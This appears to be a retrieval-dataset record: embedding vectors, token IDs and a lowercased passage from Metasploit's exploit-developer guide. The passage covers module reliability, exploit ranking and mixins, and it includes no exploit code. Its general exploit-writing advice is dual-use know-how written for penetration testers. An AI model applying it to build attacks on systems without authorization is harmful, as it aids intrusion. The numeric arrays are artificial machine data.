-0.39064154028892517, 0.3860345780849457, -0.12063708156347275, 0.47358617186546326, 0.6670900583267212, 0.055322591215372086, -0.19019509851932526, 0.5130956172943115, -0.36776721477508545, -1.5041543245315552, 1.1705763339996338, 0.0989987850189209, 0.10618177801370621, 0.13861580193042755, -0.508665919303894, 0.43482616543769836, -0.6806668043136597, 0.18428616225719452, 0.9172175526618958, 0.8973636627197266, 0.4158649146556854, -0.6702551245689392, 0.5445879101753235, 0.6453156471252441, 0.22704041004180908, 0.6725236177444458, -0.11865993589162827, 0.5369549989700317, -0.27126020193099976, -0.4058857858181, -0.4163135290145874, -0.44880273938179016, -0.26565855741500854, 0.26631733775138855, -0.32142385840415955, 0.7803829908370972, -0.2510729730129242, -0.7747735381126404, -0.11887045204639435, 0.35763680934906006, -0.0735468938946724, 0.061719708144664764, 0.5976163148880005, 1.2656588554382324, -0.1164252832531929, 0.0808311402797699, 0.5992128252983093, -0.4351038932800293, -0.07490132004022598, 0.4605430066585541, 0.14760905504226685, -0.7059478759765625, 0.47424498200416565, 0.39116600155830383, -0.7511700987815857, -0.8212661743164062, -1.0905230045318604, -0.3748641014099121, 0.1335371881723404, -0.4370311498641968, -0.5132502317428589, -0.3072587251663208, 0.20214858651161194, 0.39795270562171936, 0.6150122880935669, -0.015351100824773312, 0.19223429262638092, -0.6430606245994568, -0.1822105497121811, -0.1758476346731186, 0.2412388175725937, 0.27633601427078247, -0.7726603746414185, -0.7755430936813354, -0.3759814202785492, -0.07139308005571365, -0.1271529197692871, -0.388754665851593, 0.5778456330299377, -0.19583138823509216, 0.4079550802707672, 0.2730921804904938, -0.3995627462863922, 0.3230572044849396, -0.01406932808458805, 0.28783437609672546, 0.6349555850028992, -0.3835371136665344, -0.5570985674858093, -0.2266951948404312, 0.20613838732242584, -0.2995220422744751, 0.6489322781562805, 0.5290689468383789, -0.40382757782936096, -0.39214640855789185, -0.22314336895942688, -0.2495414763689041, -1.016738772392273, -0.2097983956336975, -1.034810185432434, -0.19962505996227264, 0.10650890320539474, 0.13465529680252075, 0.23910951614379883, -0.02948036976158619, -0.4509756863117218, -0.1747535765171051, -0.5755942463874817, 0.2944696247577667, -0.05568736419081688, -0.3150882422924042, -0.08111497014760971, 0.14425136148929596, -0.4998221695423126, -0.1760404407978058, -0.07183453440666199, 0.13849155604839325, -0.3895742893218994, -0.3500628173351288, -0.122238889336586, 0.3226575255393982, -0.6806805729866028, 0.26701146364212036, -0.7152692675590515, 0.32797834277153015, 0.5877795815467834, -1.0890306234359741, -0.07476262748241425, 0.6549363136291504, -0.2562955319881439, 0.21954359114170074, -0.47288069128990173, 0.13113470375537872, 0.29283446073532104, -0.5368185043334961, 0.7370656132698059, 0.17598912119865417, 0.4242050051689148, 0.05929240584373474, -0.10268203914165497, -0.8620726466178894, 0.16719742119312286, -0.14969131350517273, -0.5379084944725037, -0.14163179695606232, -0.9178792238235474, 0.4150124788284302, -0.3456764221191406, -0.07117950171232224, 0.45034196972846985, 0.5094621777534485, -0.10817518830299377, 0.005195351783186197, 0.10699188709259033, 0.9557482600212097, 0.986581563949585, -0.09438959509134293, 0.05288786068558693, 0.5084767937660217, 0.27185922861099243, -0.14110542833805084, 0.35362035036087036, 0.3088592290878296, -0.33006227016448975, 0.2147577404975891, -0.17086128890514374, -0.2929444909095764, -0.3270472586154938, -0.24499011039733887, -0.18751271069049835, 0.08443578332662582, 0.10018037259578705, -0.3359004557132721, 0.4724012613296509, 0.1629924178123474, -0.5265502333641052, -0.4610442519187927, -0.5016264915466309, 0.30630505084991455, 0.05600415915250778, -0.7282679677009583, -0.044239357113838196, -0.38748979568481445, -0.1700608879327774, 0.028787992894649506, -0.4544072151184082, -0.13993939757347107, 0.4483789801597595, 0.09208989143371582, 0.06259390711784363, 0.6843741536140442, -1.0061432123184204, -1.1425626277923584, -0.8396615982055664, 0.11356678605079651, -0.6017788648605347, -0.8612602949142456, 0.07587219774723053, 0.8327807784080505, 0.21258997917175293, 0.49743640422821045, -0.09729237854480743, -0.08769547194242477, 0.32277432084083557, -0.025866683572530746, -0.6079385876655579, -0.07520520687103271, -0.7837573289871216, 1.0553053617477417, -0.10552326589822769, 0.294531911611557, 0.1754758059978485, 0.03618631139397621, -0.037886183708906174, -0.12655839323997498, -0.428128182888031, 0.11759429425001144, -0.02590261399745941, 0.17973719537258148, 0.47005581855773926, 0.8490281701087952, 0.6517099738121033, -0.6790717244148254, -0.29994550347328186, 0.020285243168473244, 0.6787119507789612, -0.13684862852096558, 1.0494567155838013, 0.2668706774711609, 0.3447568714618683, 0.3027406930923462, -0.43056178092956543, -0.09699974954128265, -0.23702269792556763, -0.1697821468114853, -0.44288402795791626, 0.02513846941292286, -0.5217796564102173, -0.022977322340011597, -0.4363786578178406, -0.21816787123680115, -0.1693340539932251, -0.49539411067962646, 0.19930830597877502, -0.18163292109966278, -0.17107805609703064, 0.6855142712593079, -0.6062889099121094, 0.5623449087142944, 0.23362383246421814, -0.08676470816135406, 0.5038541555404663, -0.12738147377967834, -0.7617285251617432, 0.5977188944816589, 1.0289373397827148, 0.12145094573497772, -0.7078096270561218, -0.024030419066548347, 0.18933925032615662, -0.13082873821258545, 0.10868731141090393, 0.10023476928472519, -0.880282461643219, 0.32730311155319214, 0.060550812631845474, -0.4591452181339264, -0.9566370844841003, 0.08939453214406967, 0.1818653643131256, 0.3125261068344116, -0.03975407034158707, -0.05007784441113472, -0.11451940983533859, -0.15034979581832886, 0.8243226408958435, -0.5401830077171326, -0.08435940742492676, 0.4027341604232788, -0.14253972470760345, -0.42645204067230225, 0.7754170894622803, -0.1645490825176239, 0.42468634247779846, 0.553556501865387, 1.279000997543335, 0.25497278571128845, 0.3366314768791199, -0.13267898559570312, -0.5213761329650879, 0.44177213311195374, -0.1230304166674614, -0.2753765881061554, -0.2540096640586853, 0.1503276526927948, -0.1663770228624344, 0.10135652124881744, -0.2277638465166092, 0.16450679302215576, -0.10991957038640976, 0.4079259932041168, -0.188709557056427, -0.41761332750320435, 0.8205240368843079, -1.0422108173370361, -0.611112117767334, -0.7997981905937195, 0.4423609972000122, 0.8321734070777893, 0.37376493215560913, 0.3764704465866089, -0.6143181324005127, -0.33427244424819946, -0.6894310712814331, -0.5519221425056458, 1.2862322330474854, -0.2714991569519043, -0.2011534571647644, 0.16237521171569824, -0.5569155812263489, -0.3209744691848755, 0.13837337493896484, -0.4029567539691925, -0.3374921977519989, 0.9365970492362976, 0.17235107719898224, 0.6197863817214966, 0.747626543045044, -0.21712511777877808, -0.6116703748703003, 0.4454247057437897, 0.6523889899253845, -0.5604678988456726, 0.07791416347026825, 0.8871445059776306, 0.579075276851654, 0.3817470967769623, -0.4358500838279724, 0.40222570300102234, -0.4014323055744171, 0.04176390916109085, -0.24627509713172913, -0.1790349781513214, -0.8806276321411133, -0.46549901366233826, 0.08586892485618591, 0.06819498538970947, -0.06507370620965958, 0.1165786013007164, -0.09090159833431244, -0.21599943935871124, -1.0374118089675903, -0.47803977131843567, -0.7425553202629089, -0.16673000156879425, -0.13221509754657745, 0.04693035036325455, 0.9146443605422974, -0.7635763883590698, 4.373391151428223, 0.2996295094490051, -0.25493550300598145, 0.6593515872955322, 0.722721517086029, 0.8198474645614624, 1.009849190711975, -0.4521498680114746, 0.622978925704956, -0.06323550641536713, -0.009431901387870312, 0.16687671840190887, 0.2705959379673004, 0.45539045333862305, 0.6841546893119812, 0.4016694724559784, -0.7137510776519775, -0.04645641893148422, 0.09026382863521576, -1.0384727716445923, -1.1094188690185547, 0.005827239248901606, -0.5487985014915466, 0.7271515130996704, 0.505692720413208, -0.044263482093811035, -0.014202757738530636, -0.4342638850212097, 0.4415408670902252, 0.15092065930366516, -0.08086997270584106, 0.28242218494415283, 0.4670138657093048, -0.4467541575431824, -0.40829411149024963, 0.24391385912895203, 0.13612644374370575, -0.41400599479675293, -0.3441949486732483, -0.13663350045681, 0.45439180731773376, 0.2193732112646103, -0.23289024829864502, -0.6497731804847717, 0.6854839324951172, 1.1068204641342163, -0.20361019670963287, 0.1143430694937706, 1.0389958620071411, -0.6201195120811462, 0.08471990376710892, 0.13779614865779877, 0.7855167388916016, 0.2980940341949463, -0.777882993221283, 0.5118597745895386, -0.15251915156841278, -0.23565776646137238, -0.031371310353279114, -0.11751021444797516, 0.21571975946426392, -0.1698811799287796, 0.27948513627052307, -0.2299875020980835, -0.3587372303009033, 0.47480061650276184, 0.22569294273853302, 0.6687848567962646, -0.3504357635974884, 0.047382961958646774, 0.34820929169654846, -0.1762240082025528, -0.5582171678543091, -0.08560537546873093, 0.7089986205101013, 0.011896703392267227, -0.08173015713691711, -0.49394452571868896, 0.06516773998737335, -0.38737785816192627, -0.49368852376937866, -0.6991297006607056, -0.9492079019546509, 0.18799751996994019, 0.5088440775871277, 0.1613377332687378, 0.6515433192253113, -0.13294996321201324, -0.1635405421257019, 0.49109673500061035, 0.5047149658203125, 0.6353875994682312, -0.40191206336021423, 0.6652331352233887, 0.19332255423069 ]
[ 101, 2006, 2023, 3931, 24759, 2319, 2115, 11336, 26763, 2075, 18532, 15725, 22083, 2594, 21025, 2102, 10954, 2890, 25523, 3367, 5369, 2613, 18577, 1011, 11865, 2369, 18077, 2458, 3475, 1521, 1056, 2941, 2055, 2029, 2653, 2017, 5454, 2000, 3857, 2009, 1025, 2009, 1521, 1055, 2055, 2115, 10480, 4824, 1997, 2129, 7953, 2003, 13995, 2011, 1996, 4646, 2017, 1521, 2128, 2139, 8569, 12588, 1010, 1998, 2129, 2000, 5114, 2491, 2011, 26242, 2009, 1012, 2008, 1521, 1055, 2157, 1025, 1996, 3145, 18351, 2003, 1523, 2139, 8569, 12588, 1012, 1524, 2115, 8026, 18902, 6342, 1006, 7901, 1011, 3330, 1007, 2003, 2073, 1996, 2613, 18577, 1011, 11865, 2003, 1012, 2174, 1010, 2065, 2115, 3125, 3475, 1521, 1056, 2074, 2055, 20095, 1037, 10250, 19879, 4263, 1010, 2021, 2941, 2215, 2000, 5195, 4697, 1010, 2000, 5441, 1010, 1998, 2000, 3073, 2224, 1999, 1996, 6742, 2088, 1010, 2017, 2342, 1037, 2458, 7705, 1012, 1998, 2023, 2003, 2073, 18804, 13102, 4135, 4183, 3310, 1999, 1012, 2009, 1521, 1055, 1037, 7705, 2008, 1521, 1055, 2489, 1998, 2330, 1011, 3120, 1010, 8851, 5201, 2011, 6950, 2105, 1996, 2088, 1012, 2061, 2043, 2017, 4339, 1037, 18804, 13102, 4135, 4183, 18077, 1010, 2017, 2123, 1521, 1056, 2031, 2000, 4737, 2055, 2151, 24394, 3314, 1010, 2030, 2383, 1996, 3308, 2544, 1010, 2030, 2025, 2383, 2438, 18093, 2015, 2005, 2367, 7279, 22199, 2075, 16820, 2000, 5454, 2013, 1010, 4385, 1012, 1996, 2801, 2003, 2035, 2017, 2342, 2000, 2079, 2003, 3579, 2006, 2311, 2008, 18077, 1010, 1998, 2498, 2062, 1012, 2933, 2115, 11336, 8873, 12096, 1010, 3198, 4426, 2097, 18077, 2075, 2023, 18130, 2765, 1999, 23448, 1037, 18093, 1029, 2065, 2025, 1010, 2059, 2750, 18077, 2075, 1037, 18130, 1010, 2005, 18804, 13102, 4135, 4183, 1521, 1055, 5682, 1996, 11336, 2052, 2991, 2046, 1996, 9830, 4696, 1012, 4406, 3015, 1037, 6947, 1011, 1997, 1011, 4145, 1010, 2043, 2017, 4339, 1037, 18804, 13102, 4135, 4183, 11336, 1010, 2017, 2342, 2000, 2228, 2055, 2129, 5198, 2453, 2224, 2009, 1999, 1996, 2613, 2088, 1012, 22150, 2003, 2788, 2019, 2590, 5783, 2000, 2228, 2055, 1012, 2064, 2115, 18077, 6162, 3642, 7781, 2302, 7510, 1037, 5371, 1029, 2064, 1996, 7953, 2298, 2062, 6721, 1010, 2061, 2009, 1521, 1055, 2062, 3697, 2000, 11487, 1029, 2129, 2055, 27885, 25608, 10719, 1029, 2003, 2009, 11717, 14203, 4026, 1029, 2064, 2009, 2022, 2062, 6540, 2302, 12894, 1996, 2291, 1029, 3046, 2000, 2022, 10480, 2055, 18077, 3085, 5918, 1012, 2788, 1010, 1037, 11829, 2003, 3563, 2000, 1037, 2846, 1997, 4617, 2030, 2130, 16473, 1012, 2065, 2017, 2064, 1521, 1056, 8073, 4638, 2008, 1010, 2017, 2342, 2000, 2012, 2560, 5254, 2009, 1999, 1996, 6412, 4873, 1012, 2070, 1997, 2115, 18077, 1521, 1055, 5461, 2453, 2036, 2022, 4646, 1011, 3563, 1012, 2005, 2742, 1010, 2017, 2064, 2202, 5056, 1997, 1037, 3563, 5248, 1999, 1996, 4646, 2000, 9699, 16721, 16169, 2015, 1996, 2126, 2017, 2215, 1010, 2021, 2672, 2009, 1521, 1055, 2053, 17417, 2121, 1999, 1996, 10947, 2544, 1010, 2061, 2008, 3957, 2017, 2070, 9211, 3314, 1012, 2515, 2009, 2342, 1037, 3822, 1011, 2283, 6922, 2000, 2147, 2008, 2089, 2025, 2130, 2022, 5361, 2011, 3071, 1029, 2130, 2065, 2009, 2003, 1010 ]
metasploit
113.txt
0
is the component revised often enough that it could make your exploit less reliable? know that in the real world, your exploit can break or fail in a lot of different ways. you should try to find out and fix it during the development and testing phase before learning the hard way. rankingas you can see, reliability is important to metasploit, and we try to be more friendly about this for the users. i know what you ’ re thinking : β€œ well, if they ’ re using the exploit, they should understand how it works, so they know what they ’ re getting themselves into. ” in the perfect world, yes. knowing how a vulnerability works or how an exploit works will only benefit the user, but you see, we don ’ t live in the perfect world. if you ’ re in the middle of a penetration test, it ’ s very unlikely to always find the time to recreate the vulnerable environment, strip the exploit to the most basic form to debug what ’ s going on, and then do testing. chances are you have a tight schedule to break into a large network, so you need to use your time carefully. because of this, it ’ s important to at least have a good description and good references for the module. and of course, a ranking system that can be trusted. the metasploit framework has seven different rankings to indicate how reliable an exploit is. see exploit ranking for more details. templateif you have read this far, we think you are pretty impressive because it ’ s a lot to digest. you are probably wondering why we haven ’ t had a single line of code to share in the writeup. well, as you recall, exploit development is mostly about your reversing skills. if you have all that, we shouldn ’ t be telling you how to write an exploit. what we ’ ve done so far is hopefully get your mindset dialed - in correctly about what it means to become a metasploit exploit developer for the security community ; the rest is more about how to use our mixins to build that exploit. well, there are a lot of mixins, so it ’ s impossible to go over all of them in a single page, so you must either read the api documentation, existing code examples, or look for more wiki pages we ’ ve written to cover specific mixins. for example, if you ’ re looking for a writeup about how to interact with an http server, you might be interested in : how to send an
[ 0.09300671517848969, 0.05381130054593086, -0.6430610418319702, 0.14562459290027618, -0.2896080017089844, -0.5404587388038635, -0.5091269612312317, -0.27979689836502075, 0.2315719872713089, 1.0185431241989136, 0.6679044961929321, -0.3511739671230316, 0.5351079106330872, -0.8401229381561279, -0.2635411024093628, -0.07364024966955185, -0.013370417058467865, -0.18629494309425354, -1.2664021253585815, 0.0318521223962307, 0.33370187878608704, -0.7480878233909607, 0.05319423973560333, -0.08396171033382416, -0.174651637673378, 0.3134287893772125, 0.18875451385974884, -0.25580722093582153, 0.3471427857875824, 0.50349360704422, 0.2303762137889862, -0.024921678006649017, 0.05549899861216545, -0.5882200002670288, 0.19716627895832062, -0.19707730412483215, 0.8966469764709473, -0.22816050052642822, 0.010353350080549717, -0.64288330078125, 0.6122084856033325, -0.28983429074287415, -0.5788394808769226, -0.45180535316467285, -0.14955581724643707, -0.1646081954240799, -0.5135242938995361, -0.2666371166706085, 1.0210556983947754, -0.24111582338809967, 0.8262673020362854, 0.27710554003715515, -0.028401261195540428, 0.6755046844482422, -0.05746929347515106, 0.02723323181271553, 0.02781539224088192, 0.37655526399612427, -0.45486563444137573, 0.3457919955253601, -0.20669279992580414, 0.19816699624061584, 0.1177564486861229, -1.104649543762207, -0.29375284910202026, 0.4600021243095398, -0.13872520625591278, 0.4462399482727051, -0.470706582069397, -0.4949817657470703, 0.10187722742557526, 0.33886703848838806, -0.6967414021492004, -0.818538248538971, -0.7557675838470459, -0.052838247269392014, 1.0131893157958984, -0.23358136415481567, -0.2074640840291977, 0.6728845834732056, 0.09578847140073776, 0.45577284693717957, 0.5761215686798096, -0.035760968923568726, 0.1029905304312706, -0.05415281653404236, 0.6062395572662354, 0.6576876640319824, -0.17562714219093323, -0.33022403717041016, 0.8516324758529663, 0.3293286859989166, -0.12542328238487244, 0.13235987722873688, 0.37105652689933777, 0.26761454343795776, -0.5313989520072937, 0.11843232065439224, -0.14993128180503845, 0.24485048651695251, 0.5234109163284302, 0.8545106649398804, 0.2742435932159424, 0.5435877442359924, -0.1575140506029129, 0.35080620646476746, 0.18371596932411194, -0.2603769302368164, 0.09567372500896454, -0.26475709676742554, 0.5394160151481628, 0.5213609337806702, -0.37908440828323364, -1.0366089344024658, 0.0803324431180954, 0.06036009266972542, 0.28606271743774414, -0.11966288834810257, -0.3040698170661926, 0.5327911972999573, -0.5125213861465454, -0.17744670808315277, -0.2672865092754364, 0.18070551753044128, 0.10287661105394363, 0.0797441229224205, -0.16726531088352203, 0.887333333492279, -0.23357942700386047, -0.5902956128120422, -0.7003533840179443, -0.38601627945899963, 0.27682313323020935, 0.8416701555252075, -0.17318008840084076, 0.8308101296424866, 0.15366630256175995, -0.007472502067685127, 0.946829617023468, -0.7125192880630493, 0.061454497277736664, 0.09616772085428238, 0.3429657220840454, 0.9991183280944824, 0.15481412410736084, -0.3985743820667267, -0.21855317056179047, -0.5673919916152954, 0.058853697031736374, 0.7234563827514648, 0.13691231608390808, -0.526614248752594, 0.6414721608161926, -0.17327989637851715, -0.47614964842796326, -0.2756463289260864, -1.069949746131897, 0.8992157578468323, -0.23020903766155243, -0.5038436651229858, -0.08323860913515091, 1.1218276023864746, 0.17029032111167908, 0.7593157887458801, -0.6806811690330505, 0.5168071389198303, -0.5357192158699036, -1.168621301651001, -0.38195472955703735, -0.18961969017982483, 0.5994449257850647, -0.19456537067890167, 0.462695837020874, 0.07761283963918686, 0.9421594738960266, 1.2133164405822754, -0.4376053512096405, -0.37057268619537354, -0.016726836562156677, 0.16865943372249603, -0.9798523187637329, 0.09578927606344223, 0.3601081371307373, 0.700617790222168, -0.09157002717256546, -0.32761484384536743, -0.19189386069774628, -1.0388768911361694, -0.09035968035459518, 0.23549433052539825, -0.12572190165519714, 0.5337753891944885, -0.15352652966976166, -0.12282631546258926, 0.39885199069976807, -0.6526894569396973, -1.489351511001587, 0.2509225606918335, -0.33812788128852844, -1.367209553718567, 0.049303680658340454, 0.663793683052063, 0.5229129195213318, 0.7091497182846069, -0.6056936383247375, -0.23352986574172974, 0.31676849722862244, 0.2212005853652954, -0.3956477642059326, 0.39553385972976685, 0.5522193908691406, -0.2279137223958969, -0.46977588534355164, 0.34456297755241394, -0.1909361183643341, 0.5404409170150757, -0.6130762696266174, 0.44287535548210144, 0.06297748535871506, 0.33986198902130127, -0.43185845017433167, -0.05319391191005707, 0.7410258650779724, -0.2502114474773407, 0.18847188353538513, -0.5351593494415283, 0.21295425295829773, 0.31491607427597046, 0.21123002469539642, -0.386237770318985, -0.17775772511959076, 0.5447820425033569, 0.2832397222518921, 0.7349448204040527, 0.1999744027853012, -0.40708354115486145, 0.4565218389034271, 0.5164366960525513, 0.22506071627140045, -0.07262524962425232, -0.03280787542462349, 1.0341875553131104, -0.13911134004592896, 0.6545321345329285, 0.7318631410598755, 0.5128796100616455, 0.36862242221832275, 0.1415846347808838, 0.1819162517786026, 0.43436914682388306, -0.6604095101356506, 0.7831119298934937, -0.2493855506181717, -0.22501757740974426, -0.3887876272201538, -0.7725077867507935, 0.05878743156790733, 0.7880873680114746, -1.4218919277191162, -0.7255767583847046, -0.01590663008391857, -0.08041949570178986, -0.45940813422203064, -0.4109835624694824, 0.057980794459581375, 0.17210331559181213, 0.36545974016189575, 0.45370325446128845, -0.07066885381937027, -0.6022706627845764, -0.3339342772960663, 0.25946974754333496, -0.7107971906661987, -0.7317083477973938, -0.752282977104187, 0.16086280345916748, -0.3967007100582123, -0.514984130859375, -0.1790175437927246, -0.18534448742866516, -0.28239208459854126, 0.11170317977666855, 0.10863855481147766, 0.5835123062133789, 0.37743091583251953, -0.2193199247121811, -0.4646558463573456, 0.39703062176704407, -0.27519655227661133, 0.880627453327179, 0.17569945752620697, -0.16054587066173553, 0.013529873453080654, -0.25719478726387024, -0.1645636260509491, 0.08960185945034027, 0.7550233602523804, 0.4494856297969818, 0.47031792998313904, 0.02184285968542099, 0.070958212018013, -0.384051650762558, 0.6126428842544556, -0.13030527532100677, -0.05835697799921036, 0.6576835513114929, -0.4151372015476227, -0.13356488943099976, 0.23574763536453247, 0.40583133697509766, -0.5070343613624573, 0.9365509748458862, -0.01796065829694271, 0.2255469709634781, -0.7140949368476868, 0.4367959201335907, 0.4898320734500885, 0.1031746119260788, -0.228308767080307, -0.23294655978679657, 0.3654795289039612, -0.7615355849266052, 0.11863771080970764, -0.42542585730552673, -0.35720500349998474, 0.7942802906036377, 0.24713967740535736, -0.69478440284729, 0.3611065447330475, -0.6529334783554077, -0.2990458607673645, -0.0376574732363224, 0.410168319940567, 1.2980983257293701, 0.303343266248703, -0.011541622690856457, -0.3701103627681732, -0.18813258409500122, -0.2141765058040619, 0.03628746420145035, 0.04522309824824333, -0.5948882699012756, 0.5981203317642212, -0.22301079332828522, -0.16812703013420105, 0.776674747467041, 0.6461062431335449, -0.8653467893600464, -0.44716760516166687, 0.35832497477531433, -0.6173908710479736, 0.509168803691864, 0.6437745690345764, 0.7996572256088257, 0.1649889349937439, 1.3222075700759888, 0.0017851315205916762, -0.030861439183354378, 0.08648733794689178, 0.03420799598097801, 0.006822891067713499, 0.0521964430809021, -0.24530407786369324, 0.20782522857189178, -0.27150943875312805, -0.07943622022867203, -0.35881921648979187, 0.6617494225502014, 0.2646099328994751, -0.20228907465934753, 0.7924224138259888, 0.006239112466573715, 0.05731905251741409, 0.27590763568878174, 0.03769604116678238, -1.0567470788955688, 0.35151517391204834, 0.004077973309904337, 0.45429933071136475, -0.3912387192249298, 0.4476874768733978, -0.13349999487400055, 0.5218738913536072, 0.13610081374645233, -0.13310107588768005, -0.6103644967079163, -0.5754880309104919, -0.794359564781189, -0.40312284231185913, -0.6698911786079407, -0.5871254205703735, -0.011937770061194897, 0.7435998320579529, -0.25069475173950195, -0.6361173987388611, -0.6744670867919922, 0.7829220294952393, 0.7966857552528381, 0.33534830808639526, 0.5362513065338135, 0.6019952297210693, 0.5746678709983826, -0.1326903998851776, -0.06795688718557358, -0.24215348064899445, -0.1388017237186432, -0.14854764938354492, 0.42714518308639526, -0.13305413722991943, 0.28234514594078064, 0.10821755975484848, 0.08351670205593109, -0.6965743899345398, -0.38883689045906067, -0.3602343201637268, -0.1296824961900711, -0.45228859782218933, -0.11593437939882278, 0.12824566662311554, 0.14835228025913239, -0.473468542098999, -1.22858726978302, -0.7565403580665588, 0.2429824322462082, 0.4791218936443329, -0.6314852833747864, -0.6610984802246094, -0.4796879291534424, -0.3792745769023895, 0.23314255475997925, 0.6142168045043945, -0.060255374759435654, -0.42696109414100647, -0.21004024147987366, -0.7863552570343018, -0.334099143743515, 0.36101847887039185, 0.4897683560848236, -0.310594767332077, -0.7710860967636108, 0.28657978773117065, 0.12917155027389526, -0.9888643622398376, -0.31234046816825867, 0.06500773876905441, 0.3944714665412903, -0.12629228830337524, 0.51326984167099, -0.7038629055023193, -0.2672409117221832, 0.41534310579299927, -0.8294851183891296, 0.7384185194969177, -0.6394532322883606, 0.3478342890739441, 0.15111225843429565, 0.25707340240478516, 0.2662518322467804, -0.08568556606769562, -1.059126853942871, -0.082427978515625, -0.4312223196029663, 0.14136110246181488, -0.8420250415802002, -0.16231787204742432, 0.10520700365304947, -0.11203807592391968, -0.7250366806983948, 0.310005784034729, 0.2996988892555237, 0.03422422707080841, 0.07857199758291245, -0.5468975305557251, -0.934745192527771, 0.6548165678977966, -0.5319200754165649, -0.08193009346723557, 0.1886446177959442, 0.12602022290229797, -0.34311890602111816, -0.24829959869384766, 1.2094329595565796, 0.7220548987388611, 0.1488092541694641, -0.8414595127105713, 0.022561799734830856, 0.8188095688819885, 0.1631658673286438, 0.061987798660993576, -0.023076623678207397, -0.13953103125095367, -0.4225515127182007, -0.8271701335906982, 0.008786694146692753, -0.7446767687797546, -0.4773896038532257, -0.046169620007276535, -0.035462636500597, -0.007751203142106533, 0.04275607690215111, 0.3159607946872711, -0.05144863203167915, -0.19254860281944275, 0.05984989553689957, -0.30525752902030945, 0.1424679309129715, -0.5527604222297668, 0.013596024364233017, -0.6543563604354858, 0.41903457045555115, -0.24799096584320068, 0.06289055943489075, -0.17164233326911926, 0.2701897621154785, 0.44044965505599976, 0.10214634984731674, 0.40291616320610046, -0.2613709270954132, -0.709770679473877, 0.7902047634124756, 0.31232699751853943, -0.6710326075553894, 0.20097526907920837, 0.3446468710899353, -0.4430306851863861, 0.09385931491851807, -0.00020797757315449417, 0.06320608407258987, -0.7561509609222412, -0.7223274111747742, -0.15024812519550323, -0.5640109777450562, 0.02851710096001625, -0.838324785232544, -0.5842555165290833, -0.5103732943534851, 0.299732506275177, 0.09007451683282852, -1.3603540658950806, -0.06122417002916336, -0.28349050879478455, 0.5195480585098267, 0.5566080212593079, -0.5112178325653076, -0.4140694737434387, -0.8536068201065063, 0.059373218566179276, 0.5094326734542847, -0.022653769701719284, -0.4424956738948822, -0.1282510608434677, -0.08416526019573212, 0.3302639424800873, 0.3260173499584198, -0.6158667802810669, -0.15540653467178345, -0.004756983369588852, 0.07908334583044052, -0.289416640996933, 0.6839301586151123, -0.3067673146724701, 0.6968452334403992, 0.326677143573761, 0.7606643438339233, 0.10354714840650558, 0.5094694495201111, -0.33731845021247864, 0.1979825645685196, 0.4135359227657318, -0.4457348585128784, 0.27809587121009827, -0.20898199081420898, 0.3367869257926941, 0.29686787724494934, -0.3302529752254486, -0.5942641496658325, 0.2672136723995209, -0.4517468512058258, -1.9250547885894775, 0.7941973805427551, 0.05220528319478035, 0.5114530920982361, -0.1498854011297226, -0.8750489950180054, 0.07801514863967896, -0.16413865983486176, -0.005792740732431412, 0.7713425159454346, 0.6609622836112976, 0.5273468494415283, -0.639541506767273, 0.6314202547073364, 0.5661359429359436, -0.07577238231897354, 0.680511474609375, 0.1483696550130844, 0.24156396090984344, -0.36505624651908875, -0.4834957420825958, 0.2475416511297226, -0.551716148853302, -0.41009625792503357, 0.1902836412191391, -0.7045578360557556, 0.4516375660896301, -0.3118220865726471, -0.3131472170352936, 0.16997505724430084, 0.10371803492307663, 0.08517901599407196, 0.13785703480243683, 0.5263258218765259, 0.358665406703949, 0.0689149871468544, -0.38419684767723083, -0.04846322908997536, 0.025381267070770264, -0.14672739803791046, 0.22590065002441406, 0.6617060899734497, -0.12296508252620697, 0.7187477350234985, -0.2297905683517456, -0.5965520739555359, -0.4707730710506439, -1.056475043296814, -0.3907369077205658, 0.6171937584877014, -0.8705188035964966, -0.213192880153656, 0.21550767123699188, 0.0058354600332677364, 0.1506681889295578, 0.4618202745914459, -0.3017893433570862, 0.2376936972141266, -0.6346786022186279, 0.27294090390205383, 0.37719637155532837, 0.519163966178894, 0.4750306010246277, -0.29464685916900635, -0.46723753213882446, -0.5101853013038635, 0.1152985617518425, 0.16977939009666443, 0.026235058903694153, 0.48418617248535156, 0.4379357397556305, 0.027813538908958435, -0.027412008494138718, -0.05516025051474571, 0.5241903066635132, -0.3209514319896698, 0.672721803188324, 0.5934427380561829, -0.5497006773948669, -1.0432039499282837, -0.5798791646957397, 0.163669154047966, -0.5194774270057678, 0.7629370093345642, -0.4485149681568146, -0.03963569179177284, -0.49696779251098633, 0.23893848061561584, -0.39136233925819397, -0.9438092112541199, -0.14047370851039886, -1.3244433403015137, -0.2280738204717636, 0.44740521907806396, 0.14867472648620605, 0.14954428374767303, 0.08617603778839111, -0.4636763036251068, -0.15992671251296997, -0.5672416090965271, 0.3093036413192749, -0.1824016273021698, -0.11193016171455383, 0.06407264620065689, 0.44694387912750244, -0.8767017722129822, -0.33268266916275024, -0.4978540241718292, -0.5767160654067993, -0.3222135603427887, -0.522369921207428, -0.1635844111442566, 0.20745587348937988, -0.8998968005180359, 0.28657716512680054, -0.5939938426017761, 0.46234020590782166, 0.20784005522727966, -0.7649012207984924, -0.20459085702896118, 0.4588765799999237, -0.7107275128364563, 0.184311643242836, -0.276827335357666, -0.11873626708984375, 0.05714692920446396, -0.1480746567249298, 0.30536556243896484, -0.1043887734413147, 0.5252932906150818, -0.13094405829906464, 0.41064250469207764, -0.4342510402202606, 0.5093402862548828, -0.29487714171409607, -0.5676363706588745, 0.12865374982357025, -0.6869440078735352, 0.23031608760356903, 0.3838108777999878, -0.5247017741203308, -0.24122829735279083, 0.6070531010627747, -0.09352485090494156, 0.20994384586811066, -0.03966573253273964, 0.5659865736961365, 0.6519492864608765, 0.23208515346050262, -0.266083687543869, 0.23356996476650238, 0.04271025210618973, 0.2714454233646393, 0.1404794603586197, 0.48128730058670044, -0.12451422959566116, 0.8232485055923462, -0.14177292585372925, 0.07635073363780975, 0.4464176297187805, -0.43541380763053894, -0.7539461255073547, 0.2836596369743347, 0.16418194770812988, -0.3730488717556, 1.079830288887024, -0.39862731099128723, -0.6072045564651489, 0.009293979033827782, -0.24695070087909698, 0.10322310030460358, 0.10672774910926819, -0.7502065896987915, -0.2954212427139282, -0.47419053316116333, 0.041660375893116, -0.1280377358198166, -0.34793564677238464, 0.013846983201801777, 0.3188551962375641, -0.5995960831642151, 0.08930785953998566, 0.502951443195343, -0.6131818890571594, -0.12870977818965912, -0.3854476511478424, 0.15041206777095795, -0.31273049116134644, -0.6346390247344971, -0.4005246162414551, 1.0916084051132202, 0.1442091166973114, 0.27033546566963196, 0.3425552248954773, 0.0467313714325428, 0.26681435108184814, 0.003829993773251772, 0.07561582326889038, 0.18833324313163757, 